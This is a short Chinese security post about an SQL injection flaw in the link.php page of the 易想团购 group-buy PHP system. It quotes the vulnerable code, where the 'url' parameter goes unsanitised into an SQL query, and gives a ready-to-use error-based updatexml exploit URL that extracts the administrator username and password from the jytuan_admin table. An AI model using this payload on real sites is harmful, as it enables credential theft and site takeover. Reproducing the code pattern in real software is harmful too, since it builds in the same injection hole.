易想团购 系统 link.php页面内代码
if($_REQUEST['act']=='go') //link标签 go { $url = ($_REQUEST['url']); //直接取了url的值就带入了sql查询语句了 $link_item = $GLOBALS['db']->getRowCached("select * from ".DB_PREFIX."link where (url = '".$url."' or url = 'http://".$url."') and is_effect = 1"); //带入查询了 if($link_item) { if(check_ipop_limit(get_client_ip(),"Link",10,$link_item['id'])) $GLOBALS['db']->query("update ".DB_PREFIX."link set count = count + 1 where id = ".$link_item['id']); $url = "http://".$url; } else { $url = APP_ROOT."/"; } app_redirect($url); }
EXP: \ http://HdhCmsTestxxx测试数据/link.php?act=go&city=sanming&url=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from jytuan_admin limit 1)),1))%23
查看更多关于易想购物link.php sql注入 - 网站安全 - 自学php的详细内容...